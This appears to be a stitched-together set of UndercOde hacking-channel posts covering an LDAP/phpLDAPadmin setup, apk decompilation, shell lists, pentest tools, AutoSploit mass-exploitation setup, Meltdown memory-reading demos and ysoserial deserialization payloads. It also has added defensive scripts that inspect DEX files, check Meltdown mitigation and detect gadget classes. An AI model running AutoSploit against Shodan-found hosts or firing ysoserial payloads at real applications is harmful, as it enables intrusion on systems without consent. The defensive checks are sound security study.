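    if env.get("LDAP_REPLICATION", "false").lower() == "true":
        providers = [urlparse(h).hostname for h in parse_hosts(env.get("LDAP_REPLICATION_HOSTS", ""))]
        if hostname not in providers:
            findings.append("LDAP_REPLICATION_HOSTS must include this container's own --hostname")
    return findings


def build_command(env, hostname=None, image=IMAGE, persist=True):
    """Assemble the docker run argv (env sorted so two runs diff cleanly)."""
    argv = ["docker", "run", "--detach"]
    if hostname:
        argv += ["--hostname", hostname]
    for key, value in sorted(env.items()):
        argv += ["--env", f"{key}={value}"]
    if persist:
        for host_path, container_path in VOLUMES.items():
            argv += ["--volume", f"{host_path}:{container_path}"]
    argv.append(image)
    return argv


def main():
    # Constructed sample: one node of a replicated pair with non-default secrets.
    env = {
        "LDAP_ORGANISATION": "My company",
        "LDAP_DOMAIN": "my-company.com",
        "LDAP_ADMIN_PASSWORD": "change-me-admin",
        "LDAP_CONFIG_PASSWORD": "change-me-config",
        "LDAP_TLS_ENFORCE": "true",
        "LDAP_REPLICATION": "true",
        "LDAP_REPLICATION_HOSTS": python2bash(["ldap://ldap.example.org", "ldap://ldap2.example.org"]),
    }
    for finding in lint_env(env, hostname="ldap.example.org"):
        print("WARNING:", finding)
    print(shlex.join(build_command(env, hostname="ldap.example.org")))


if __name__ == "__main__":
    main()
```

Run it once with your intended settings; an empty warning list and the printed command are what you paste into the shell. The replication check parses the host list back into URLs and compares host names, so a typo such as ldap.example.com versus ldap.example.org is caught before slapd starts looping on a provider that never answers.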
9) Install phpLDAPadmin
Install Apache and PHP:
yum -y install httpd php php-ldap php-gd php-mbstring php-pear php-bcmath php-xml
10) Download phpldapadmin
wget https://nchc.dl.sourceforge.net/project/phpldapadmin/phpldapadmin-php5/1.2.3/phpldapadmin-1.2.3.tgz
Unpack phpldapadmin:
tar -zxf phpldapadmin-1.2.3.tgz
11) Move the phpldapadmin directory under /var/www/html
mv phpldapadmin-1.2.3 /var/www/html/phpldapadmin
12) Edit the configuration file
cd /var/www/html/phpldapadmin/config
cp config.php.example config.php
vim config.php
13) Set the following values in config.php. The base DN, bind DN and password shown are the defaults of the openLDAP container above; replace them with your own. The host 127.0.0.1 assumes the container's port 389 is published on the docker host:
$servers->newServer('ldap_pla');
$servers->setValue('server','name','LDAP Server');
$servers->setValue('server','host','127.0.0.1');
$servers->setValue('server','port',389);
$servers->setValue('server','base',array('dc=example,dc=org'));      /* the openLDAP base DN */
$servers->setValue('login','auth_type','session');
$servers->setValue('login','bind_id','cn=admin,dc=example,dc=org'); /* the openLDAP admin DN */
$servers->setValue('login','bind_pass','admin');                    /* the openLDAP admin password */
$servers->setValue('server','tls',false);
Note: with auth_type 'session' users authenticate through the phpLDAPadmin login form, so bind_id and bind_pass can be left empty; hard-coding the admin password here puts it in a file the web server can read. 'server','tls' false means phpLDAPadmin talks to port 389 without StartTLS, which is only acceptable because the connection stays on 127.0.0.1.
14) Start the httpd service
systemctl start httpd
15) After any later change to config.php, restart httpd: systemctl restart httpd
16) Once configured, open http://[ip]/phpldapadmin in a browser. Port 80 must be reachable: open that port in the host firewall rather than disabling the firewall.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Cracking any Android apk: the process and its two main methods, by UndercOde >
Briefly, the generation process of an Android apk:
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
1) Java source code
2) javac compiles it
3) into .class files
4) the dx tool converts and packs the class files
5) plus third-party and other library files
6) into a dex file
7) apkbuilder packages the dex
8) together with the resources (resources.arsc), native libraries, etc., into an
(unsigned) apk file
9) jarsigner signs it and zipalign aligns it, giving a
(signed) apk file
10) which can be published to the various Android application markets
11) and downloaded and installed by ordinary users
@UndercOdeTesting
π¦ Cracking the Android apk is the reverse operation:
1) Recover the dex file from the apk, or hook the running app and dump the dex from memory at runtime:
2) if the app uses an ordinary packer ("reinforcement"),
3) the dex can be dumped with tools such as FDex2;
4) if it uses an advanced packing solution,
5) this is considerably harder.
6) Convert the dex file to a jar (which contains the classes), for example with dex2jar:
7) some dex files produce errors during conversion,
8) which usually indicates a more advanced packing scheme;
9) others convert without error.
10) If the resulting classes contain the app's business logic,
11) the program's Java source can then be recovered almost completely:
12) decompile the Java source from the jar,
13) and view or export all of it.
Note:
> if the code was obfuscated before release,
14) what you get at the end is the obfuscated code,
π¦ and the business logic of the original code is not easy to read.
Description
1) This process is the inverse of compilation, so its proper name is decompilation (to decompile).
2) The corresponding tool is called a decompiler.
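Steps 7 to 9 above determine what an analyst finds inside the apk: it is a zip archive holding classes*.dex, resources.arsc and, for a jarsigner (v1) signature, MANIFEST.MF plus *.SF and *.RSA/*.DSA/*.EC files under META-INF. The script below is an added example, not code from the original post or from any Android tool: it opens an apk, reports whether v1 signature files are present, and parses each DEX header (magic and version, adler32 checksum over everything after the checksum field, SHA-1 over everything after the signature field, file_size) so that a dumped or repacked dex can be checked for integrity before decompiling it. The sample apk and dex it builds are constructed test data, and the function names are this example's own.

```python
"""Inspect an apk the way the build pipeline above produces it.

Added example (not from the original post or any Android SDK tool). The DEX
header layout used here (8-byte magic, u32 adler32 checksum, 20-byte SHA-1
signature, u32 file_size, u32 header_size, u32 endian_tag) follows the public
dex format; the helper names and the constructed sample apk are this example's own.
"""
import hashlib
import io
import struct
import zipfile
import zlib

DEX_MAGIC = b"dex\n"          # followed by a 3-digit version and NUL, e.g. "035\0"
DEX_HEADER_SIZE = 0x70
ENDIAN_CONSTANT = 0x12345678


def parse_dex_header(data):
    """Validate a DEX blob and return its version and integrity checks."""
    if len(data) < DEX_HEADER_SIZE or data[:4] != DEX_MAGIC or data[7] != 0:
        raise ValueError("not a DEX file")
    version = data[4:7].decode("ascii")
    (checksum,) = struct.unpack_from("<I", data, 8)
    signature = data[12:32]
    file_size, header_size = struct.unpack_from("<II", data, 32)
    return {
        "version": version,
        "file_size": file_size,
        "header_size": header_size,
        # adler32 covers everything after the checksum field itself
        "checksum_ok": checksum == (zlib.adler32(data[12:]) & 0xFFFFFFFF),
        # SHA-1 covers everything after the signature field
        "signature_ok": signature == hashlib.sha1(data[32:]).digest(),
        "size_ok": file_size == len(data),
    }


def inspect_apk(apk_bytes):
    """Return v1 signature hints and per-DEX header checks for an apk."""
    report = {"dex": {}, "v1_signed": False, "signature_blocks": []}
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as zf:
        names = zf.namelist()
        # jarsigner (v1) leaves MANIFEST.MF, *.SF and *.RSA/*.DSA/*.EC in META-INF
        sigs = [n for n in names if n.startswith("META-INF/")
                and n.rsplit(".", 1)[-1].upper() in ("RSA", "DSA", "EC")]
        report["signature_blocks"] = sigs
        report["v1_signed"] = bool(sigs) and "META-INF/MANIFEST.MF" in names
        for name in names:
            if name.startswith("classes") and name.endswith(".dex"):
                report["dex"][name] = parse_dex_header(zf.read(name))
    return report


def make_sample_dex(version=b"035", payload=b""):
    """Build a minimal, internally consistent DEX (header plus optional payload).

    Constructed test data for this example; it is not a loadable classes.dex.
    """
    body = bytearray(DEX_HEADER_SIZE) + payload
    body[0:4] = DEX_MAGIC
    body[4:7] = version
    body[7] = 0
    struct.pack_into("<II", body, 32, len(body), DEX_HEADER_SIZE)
    struct.pack_into("<I", body, 40, ENDIAN_CONSTANT)
    body[12:32] = hashlib.sha1(body[32:]).digest()
    struct.pack_into("<I", body, 8, zlib.adler32(bytes(body[12:])) & 0xFFFFFFFF)
    return bytes(body)


def make_sample_apk(signed=True, tamper=False):
    """Assemble a tiny apk-shaped zip around the sample DEX (constructed)."""
    dex = bytearray(make_sample_dex())
    if tamper:
        dex[-1] ^= 0xFF                     # flip one byte after the signature field
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("classes.dex", bytes(dex))
        zf.writestr("resources.arsc", b"")
        if signed:
            zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
            zf.writestr("META-INF/CERT.SF", "Signature-Version: 1.0\n")
            zf.writestr("META-INF/CERT.RSA", b"\x30\x82")   # DER prefix placeholder
    return buf.getvalue()


if __name__ == "__main__":
    print(inspect_apk(make_sample_apk()))
    print(inspect_apk(make_sample_apk(signed=False, tamper=True)))
```

Point inspect_apk at a real file with open(path, "rb").read(). Two caveats: a failed checksum or signature on a dex dumped at runtime is normal, because packers rewrite headers and the dumping tool may not recompute them; and v2/v3 signatures live in the APK Signing Block between the zip entries and the central directory, so they do not show up in namelist(), and apksigner verify remains the authoritative signature check.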
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Shells
Shells commonly used by hackers
>twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
1) bash - GNU Project's shell (Bourne Again SHell)
> https://www.gnu.org/software/bash/
2) elvish - Friendly, expressive shell with features like anonymous functions and data structures
> https://elv.sh/
3) fish - Smart and user-friendly command line shell
> https://fishshell.com/
4) ksh93 - Korn Shell
> https://github.com/att/ast
5) mksh - MirBSD Korn Shell
6) nushell - A modern shell written in Rust
> https://github.com/nushell/nushell
7) oksh - Portable OpenBSD ksh
8) osh - Bash compatible, with a new/modern Unix shell language called Oil
9) pdksh - Public domain Korn shell
10) shell++ - Friendly and modern functional and object oriented shell script language
11) shenv - Simple shell version management
12) tcsh - C shell with file name completion and command line editing
13) xiki - Makes the shell console more friendly and powerful
14) xonsh - Python-ish, BASHwards-looking shell language and command prompt
15) yash - A POSIX-compliant command line shell with built-in support for completion and prediction based on command history
16) zsh - Powerful shell with scripting language
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Custom prompts and color themes: free, open-source tools for Linux (GitHub repos)
pinterest.com/UndercOdeOfficial
π¦ ππΌππ πππΈβπ :
1) base16-builder - Base16-Builder
2) bash-full-of-colors - Powerful prompt with screen, tmux, git support and many more
3) bash-git-prompt - An informative and fancy Bash prompt for Git users
4) bash-powerline - Powerline-style Bash prompt in pure Bash script
5) bashstrap - A quick way to spruce up the OSX terminal
6) bullet-train-oh-my-zsh-theme - An oh-my-zsh shell theme based on the Powerline Vim plugin
7) emojify - Emoji on the command line
8) flatui-terminal-theme - Nicer colors for the terminal
9) geometry - A minimal ZSH theme where any function can be added to the left prompt or (async) right prompt on the fly
10) git-prompt - Bash prompt with Git, SVN and HG modules
11) gittify - A colorful Bash prompt + customized Git aliases
12) Gogh - Color Scheme - Color schemes for Gnome Terminal
13) liquidprompt - A full-featured and carefully designed adaptive prompt for Bash and Zsh
14) mysql-colorize - Colorization for the mysql command-line client
15) oh-my-git - An opinionated git prompt for bash and zsh
16) polyglot - An informative Git prompt that works in bash, zsh, ksh, mksh, pdksh, dash, and busybox sh
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Tools needed for penetration testing and forensics - any Linux OS, 2020
instagram.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
Tools required for penetration testing, grouped by purpose (package names as used on Fedora/RHEL-style systems; duplicates in the original list have been removed):
1) Source code auditing: splint, pscan, flawfinder, rats
2) Binary and memory analysis: examiner, ht, hexedit, binwalk, scanmem
3) Forensics and data recovery: ddrescue, testdisk, foremost, scalpel, sleuthkit, dc3dd, afftools, xmount, safecopy, gparted, hfsutils, ntfs-3g, ntfsprogs, firstaidkit-gui, firstaidkit-plugin-all
4) Secure deletion: scrub, srm, nwipe, wipe
5) Rootkit detection and file integrity: unhide, chkrootkit, rkhunter, aide, tripwire
6) Password recovery: pdfcrack, cmospwd
7) Network capture, manipulation and reconnaissance: driftnet, ngrep, netsed, pcapdiff, sslstrip, macchanger, nc6, telnet, openssh, proxychains, dnstop, dnstracer, scamper, net-snmp, pads, labrea, nebula, bonesi
8) Traffic and system monitoring: iftop, iptraf-ng, nethogs, nload, ntop, trafshow, vnstat, iperf, uperf, powertop
9) Wireless: aircrack-ng, airsnort, kismet, weplab, cowpatty, wavemon
10) Vulnerability scanning, IDS and log management: openvas-scanner, sectool-gui, prelude-lml, prelude-manager, prewikka, picviz-gui
11) General utilities: security-menus, mc, screen, irssi, mutt, mcabber, nano, vim-enhanced, wget, yum-utils
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ AutoSploit (2019 update): automated exploitation script
pinterest.com/UndercodeOfficial
π¦Features :
1) As the name suggests, AutoSploit attempts to automate the exploitation of remote hosts.
2) Targets can be collected automatically through Shodan, Censys or Zoomeye.
> Options to add your own targets and host lists are included as well.
3) The available Metasploit modules have been selected to facilitate Remote Code Execution and to attempt to gain reverse TCP shells and/or Meterpreter sessions. The workspace, local host and local port for the MSF back connections are configured in the dialog that comes up before the exploit component is started.
4) Operational security consideration:
Receiving back connections on your local machine is a poor choice from an OPSEC standpoint. Consider running the tool from a VPS that has all the required dependencies installed instead.
5) The new version of AutoSploit lets you set a proxy and a custom User-Agent before connecting.
π¦πβπππΈπππππΈπππβ & βπβ
> Docker Compose
Using Docker Compose is by far the easiest way to get AutoSploit up and running:
1) git clone https://github.com/NullArray/AutoSploit.git
2) cd AutoSploit/Docker
3) docker-compose run --rm autosploit
> Docker
π¦ Using Docker alone:
1) git clone https://github.com/NullArray/AutoSploit.git
2) cd AutoSploit/Docker
# If you wish to change the default postgres service details, edit database.yml; it should work out of the box
# nano database.yml
> docker network create -d bridge haknet
> docker run --network haknet --name msfdb -e POSTGRES_PASSWORD=s3cr3t -d postgres
> docker build -t autosploit .
> docker run -it --network haknet -p 80:80 -p 443:443 -p 4444:4444 autosploit
Note: the last command publishes ports 80, 443 and 4444 on every interface of the Docker host. These are the listener ports for the back connections, so restrict who can reach them with the host firewall, and replace the example POSTGRES_PASSWORD.
π¦ Any Linux
1) git clone https://github.com/NullArray/AutoSploit
2) cd AutoSploit
3) chmod +x install.sh
4) ./install.sh
π¦ macOS
> AutoSploit runs on macOS only inside a Python virtual environment. Perform the steps below in a terminal or as a shell script; everything inside the heredoc runs as root because of sudo -s, and pip2 means a Python 2 interpreter is required (Python 2 reached end of life in January 2020):
1) > sudo -s << '_EOF'
2) pip2 install virtualenv --user
3) git clone https://github.com/NullArray/AutoSploit.git
4) virtualenv <PATH-TO-YOUR-ENV>
5) source <PATH-TO-YOUR-ENV>/bin/activate
6) cd <PATH-TO-AUTOSPLOIT>
7) pip2 install -r requirements.txt
8) chmod +x install.sh
9) ./install.sh
10) python autosploit.py
_EOF
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ All HTTP Injector tricks in Africa > patched > latest report
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Meltdown: latest bug, demos from the IAIK repository :
The applications in this repository are built with libkdump, a library we developed for the paper. This library simplifies exploitation of the bug by automatically adapting to certain properties of the environment.
twitter.com/UndercOdeTC
π¦πβπππΈπππππΈπππβ & βπβ
Build and first test. The Makefile needs a static glibc; yum is the Fedora/CentOS installer (on Ubuntu the static glibc ships with libc6-dev):
1) sudo yum install -y glibc-static
2) git clone https://github.com/IAIK/meltdown
3) make
4) taskset 0x1 ./test
5) a demo video is linked from the same repository
Note: the demos only leak data on a kernel without the KPTI mitigation (or with it switched off at boot). On a patched kernel the speculative reads return nothing useful.
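Before spending time on the demos below it is worth reading the kernel's own verdict. The script is an added example, not from the IAIK repository or the original post: it interprets /sys/devices/system/cpu/vulnerabilities/meltdown and /proc/cmdline and says whether the physical-memory demos can be expected to work on this machine and whether the kaslr step is needed at all. The sample inputs in main() are constructed, and the function names are this example's own.

```python
"""Pre-flight check before running the Meltdown demos above.

Added example, not from the IAIK repository or the original post. It reads the
kernel's verdict in /sys/devices/system/cpu/vulnerabilities/meltdown and the
boot command line, and reports whether the physical-memory demos can be expected
to work and whether the kaslr step is needed. Sample inputs in main() are
constructed; the function names are this example's own.
"""

VULN_FILE = "/sys/devices/system/cpu/vulnerabilities/meltdown"
CMDLINE_FILE = "/proc/cmdline"


def classify_meltdown(status):
    """Map the sysfs text to 'vulnerable', 'mitigated', 'not_affected' or 'unknown'."""
    text = status.strip()
    if text == "Not affected":
        return "not_affected"
    if text.startswith("Mitigation:"):        # e.g. "Mitigation: PTI"
        return "mitigated"
    if text.startswith("Vulnerable"):
        return "vulnerable"
    return "unknown"


def boot_flags(cmdline):
    """Pick the KASLR/KPTI related switches out of the kernel command line."""
    args = set(cmdline.split())
    return {
        "nokaslr": "nokaslr" in args,
        "pti_off": "nopti" in args or "pti=off" in args,
    }


def plan(status, cmdline):
    """Decide which of the demos above should work and what they need."""
    verdict = classify_meltdown(status)
    flags = boot_flags(cmdline)
    kaslr_on = not flags["nokaslr"]
    return {
        "meltdown": verdict,
        "kaslr_enabled": kaslr_on,
        "kpti_forced_off": flags["pti_off"],
        # reliability / physical_reader / memdump only leak on an unmitigated kernel
        "expect_physical_reads": verdict == "vulnerable",
        # with KASLR on, run ./kaslr first and pass its offset as the first argument
        "need_kaslr_offset": kaslr_on,
    }


def read_live():
    """Evaluate the running machine; returns None where the files do not exist."""
    try:
        with open(VULN_FILE) as vf, open(CMDLINE_FILE) as cf:
            return plan(vf.read(), cf.read())
    except OSError:
        return None


def main():
    # Constructed samples: a patched kernel, and an unpatched kernel booted with nokaslr.
    samples = [
        ("Mitigation: PTI\n", "BOOT_IMAGE=/vmlinuz root=/dev/sda1 ro quiet"),
        ("Vulnerable\n", "BOOT_IMAGE=/vmlinuz root=/dev/sda1 ro nokaslr"),
    ]
    for status, cmdline in samples:
        print(plan(status, cmdline))
    live = read_live()
    print("this machine:", live if live else "sysfs/cmdline not available here")


if __name__ == "__main__":
    main()
```

If the verdict is mitigated, the reliability demo below will not reach the success rates shown; if nokaslr is on the command line, the direct physical map offset is fixed and reliability and physical_reader take no offset argument.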
π¦ Demo #2: Leak the KASLR offset (kaslr)
Starting with Linux kernel 4.12, KASLR (Kernel Address Space Layout Randomization) is active by default. This means that the location of the kernel (and also of the direct physical map, which maps the entire physical memory) changes with each reboot.
1) This demo uses Meltdown to leak the (secret) randomization of the direct physical map. The demo requires root privileges to speed up the process; the paper describes a variant which does not require root privileges.
> Build and Run
> make
> sudo taskset 0x1 ./kaslr
2) After a few seconds, you should see something similar to this:
[+] Direct physical map offset: 0xffff880000000000
π¦ Demo #3: Reliability test (reliability)
This demo tests how reliably physical memory can be read. You either need the direct physical map offset, or you have to disable KASLR by specifying nokaslr on your kernel command line.
> Build and Run
Build and start reliability. If KASLR is enabled, the first parameter is the offset of the direct physical map; otherwise the program takes no parameter.
> make
> sudo taskset 0x1 ./reliability 0xffff880000000000
> After a few seconds, you should get an output similar to this:
[-] Success rate: 99.93% (read 1354 values)
π¦ Demo #4: Read physical memory (physical_reader)
This demo reads memory from a different process by directly reading physical memory. Again, you either need the direct physical map offset, or you have to disable KASLR by specifying nokaslr on your kernel command line.
> In principle, this program can read arbitrary physical addresses. However, as the physical memory contains a lot of non-human-readable data, we provide a test tool (secret), which puts a human-readable string into memory and directly provides the physical address of this string.
1) Build and Run
For the demo, first run secret (as root) to get the physical address of a human-readable string:
2) make
3) sudo ./secret
It should output something like this:
[+] Secret: If you can read this, this is really bad
[+] Physical address of secret: 0x390fff400
[+] Exit with Ctrl+C if you are done reading the secret
While the secret program is running, start physical_reader. The first parameter is the physical address printed by secret. If KASLR is not disabled, the second parameter is the offset of the direct physical map; the virtual address that is read is offset plus physical address, as the output below shows.
4) taskset 0x1 ./physical_reader 0x390fff400 0xffff880000000000
After a few seconds, you should get an output similar to this:
[+] Physical address : 0x390fff400
[+] Physical offset : 0xffff880000000000
[+] Reading virtual address: 0xffff880390fff400
5) If you can read this, this is really bad
π¦ Demo #5: Dump the memory (memdump)
This demo dumps the content of the memory. Like demos #3 and #4, it uses the direct physical map to dump the contents of physical memory in a hexdump-like format.
> Again, as the physical memory contains a lot of non-human-readable content, we provide a test tool to fill large amounts of the physical memory with human-readable strings.
Build and Run
For the demo, first run memory_filler to fill the memory with human-readable strings. The first argument is the amount of memory (in gigabytes) to fill.
> make
> ./memory_filler 9
> Then run the memdump tool to dump memory contents. If you executed memory_filler before, you should see some string fragments. If you have Firefox or Chrome with multiple tabs running, you might also see parts of the websites which are open or were recently closed.
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ How to generate payloads that exploit unsafe Java object deserialization (ysoserial)
1) ysoserial is a collection of utilities and property-oriented programming "gadget chains" discovered in common Java libraries that can, under the right conditions, exploit Java applications performing unsafe deserialization of objects.
2) The main driver program takes a user-specified command and wraps it in the user-specified gadget chain, then serializes these objects to stdout. When an application with the required gadgets on the classpath unsafely deserializes this data, the chain is invoked automatically and causes the command to be executed on the application host.
t.me/UndercOdeTesting
π¦πβπππΈπππππΈπππβ & βπβ
1) git clone https://github.com/frohoff/ysoserial
2) cd ysoserial
3) Build the jar (the clone does not contain one; alternatively download a release jar from the project's GitHub releases page):
mvn clean package -DskipTests
4) The build writes target/ysoserial-<version>-all.jar; copy or rename it to ysoserial.jar. Running it without arguments lists the available gadget chains:
java -jar ysoserial.jar
Y SO SERIAL?
Usage: java -jar ysoserial.jar [payload] '[command]'
Available payload types:
Payload Authors Dependencies
------- ------- ------------
BeanShell1 @pwntester, @cschneider4711 bsh:2.0b5
C3P0 @mbechler c3p0:0.9.5.2, mchange-commons-java:0.2.11
Clojure @JackOfMostTrades clojure:1.8.0
[...]
5) Generate a payload for a chain and a command, and look at the bytes (every payload starts with the Java serialization stream magic ac ed 00 05):
java -jar ysoserial.jar CommonsCollections1 calc.exe | xxd
Note: a chain only fires if its listed dependency is on the target's classpath (CommonsCollections1 needs commons-collections:3.1), so the Dependencies column tells you which library versions to look for on the target.
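The defensive counterpart to generating these payloads is recognising them at a boundary before ObjectInputStream ever sees them. The script below is an added example, not part of ysoserial or the original post: it checks for the serialization stream magic and pulls class names out of every TC_CLASSDESC record it can find (type byte 0x72, a big-endian u16 length, the UTF-8 class name, then an 8-byte serialVersionUID), so a proxy or log pipeline can flag streams that mention known gadget classes. The linear scan is a heuristic, the watch-list is a short illustrative subset, and the sample stream is hand-built rather than real ysoserial output; all names are this example's own.

```python
"""Fingerprint a Java serialized blob before it reaches ObjectInputStream.

Added example, not part of ysoserial or the original post. The stream magic,
TC_OBJECT/TC_CLASSDESC type codes and descriptor layout are from the Java
Object Serialization Stream Protocol; the heuristic scan, the watch-list and
the constructed sample stream are this example's own.
"""
import re
import struct

STREAM_MAGIC = b"\xac\xed\x00\x05"   # ObjectOutputStream header: STREAM_MAGIC + version 5
TC_OBJECT = 0x73
TC_CLASSDESC = 0x72
JAVA_CLASS_NAME = re.compile(rb"\A[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*\Z")

# Classes that show up in common gadget chains; extend for your own classpath.
GADGET_WATCHLIST = {
    "org.apache.commons.collections.functors.InvokerTransformer",
    "org.apache.commons.collections.functors.ChainedTransformer",
    "org.apache.commons.collections.map.LazyMap",
    "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
}


def is_java_serialized(blob):
    """True when the blob starts with the ObjectOutputStream header."""
    return blob[:4] == STREAM_MAGIC


def class_names(blob):
    """Heuristically extract class names from TC_CLASSDESC records.

    A candidate is accepted only if its length-prefixed name parses as a Java
    identifier chain; the scan then skips the 8-byte serialVersionUID. Stray
    0x72 bytes inside names or data are rejected by the identifier check.
    """
    names = []
    marker = bytes([TC_CLASSDESC])
    i = blob.find(marker)
    while 0 <= i < len(blob) - 3:
        (length,) = struct.unpack_from(">H", blob, i + 1)
        name = blob[i + 3:i + 3 + length]
        if 0 < length <= 255 and len(name) == length and JAVA_CLASS_NAME.match(name):
            names.append(name.decode("ascii"))
            i = blob.find(marker, i + 3 + length + 8)
        else:
            i = blob.find(marker, i + 1)
    return names


def inspect(blob):
    """Return a verdict dict suitable for logging or blocking decisions."""
    if not is_java_serialized(blob):
        return {"java_serialized": False, "classes": [], "gadget_hits": []}
    classes = class_names(blob)
    return {
        "java_serialized": True,
        "classes": classes,
        "gadget_hits": sorted(set(classes) & GADGET_WATCHLIST),
    }


def build_sample_stream(class_name):
    """Construct a minimal stream with one TC_OBJECT/TC_CLASSDESC record (test data)."""
    name = class_name.encode("ascii")
    return (STREAM_MAGIC
            + bytes([TC_OBJECT])
            + bytes([TC_CLASSDESC]) + struct.pack(">H", len(name)) + name
            + b"\x00" * 8                  # serialVersionUID
            + b"\x02"                      # classDescFlags: SC_SERIALIZABLE
            + b"\x00\x00"                  # field count: none
            + b"\x78\x70")                 # TC_ENDBLOCKDATA, TC_NULL superclass


if __name__ == "__main__":
    print(inspect(build_sample_stream("org.apache.commons.collections.functors.InvokerTransformer")))
    print(inspect(build_sample_stream("java.util.HashMap")))
    print(inspect(b'{"json": true}'))
```

Feed inspect() the raw body of a request or a file read in binary mode; a hit in gadget_hits is a strong signal, while java_serialized alone is only the observation that the endpoint accepts native serialization at all, which is itself the precondition ysoserial needs. Blocking by class name is a stop-gap: the durable fix is a deserialization filter (JEP 290 ObjectInputFilter) or not deserializing untrusted input.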
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ General X Window Options > commands :
t.me/UndercOdeTesting
π¦ LET'S START :
> Descriptions of the commands of the X Window System. These commands share a common set of parameters. Instead of repeating these parameters in the description of each command, they are listed here once.
> General X Window Options
> PARAMETER                    VALUE / MEANING
-background color              Set the background color of the window (a color name such as red, green or blue)
-bg color                      Same as -background
-display host:number           Use the X server with the given display number (usually 0) on the given host
-foreground color              Set the primary (foreground) color of the window (a color name such as red, green or blue)
-fg color                      Same as -foreground
-font font                     Use the specified font
-fn font                       Same as -font
-geometry widthxheight+x+y     Set the window size and position
-geometry widthxheight         Set the window size only
-geometry +x+y                 Set the position of the upper left corner of the window only
-height lines                  Set the vertical window size, in rows
-position x y                  Set the position of the upper left corner of the window, in pixels
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦2020 updated GEF - GDB Enhanced Features for exploit devs & reversers
> GEF (pronounced ʤɛf - "Jeff") is a set of commands for x86/64, ARM, MIPS, PowerPC and SPARC to assist exploit developers and reverse-engineers when using old school GDB. It adds features to GDB through the GDB Python API to assist during dynamic analysis and exploit development. Application developers also benefit from it, as GEF lifts a great part of regular GDB obscurity, avoiding the repetition of traditional commands and bringing out the relevant information from the debugging runtime.
> t.me/UndercOdeTesting
π¦ INSTALLATION & RUN :
# via the install script
1) wget -q -O- https://github.com/hugsy/gef/raw/master/scripts/gef.sh | sh
(this executes whatever the remote script contains at that moment; on a machine you care about, download it first, read it, then run it)
# manually
2) wget -O ~/.gdbinit-gef.py -q https://github.com/hugsy/gef/raw/master/gef.py
3) echo source ~/.gdbinit-gef.py >> ~/.gdbinit
Then just start playing:
4) gdb -q /path/to/my/bin
gef➤ gef help
π¦Features :
A few of GEF's features:
> One single GDB script.
> Entirely OS agnostic, no dependencies: GEF is batteries-included and installable in 2 seconds (unlike PwnDBG).
> Fast: limiting the number of dependencies and optimizing the code keep the commands as fast as possible (unlike PwnDBG).
> Provides a great variety of commands to drastically change your experience in GDB.
> Easily extendable to create other commands, by providing a more comprehensible layout over the GDB Python API.
> Works consistently on both Python2 and Python3.
> Built around an architecture abstraction layer, so all commands work on any GDB-supported architecture such as x86-32/64, ARMv5/6/7, AARCH64, SPARC, MIPS, PowerPC, etc. (unlike PEDA).
> Suited for real-life application debugging and exploit development just as much as for CTF (unlike PEDA or PwnDBG).
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β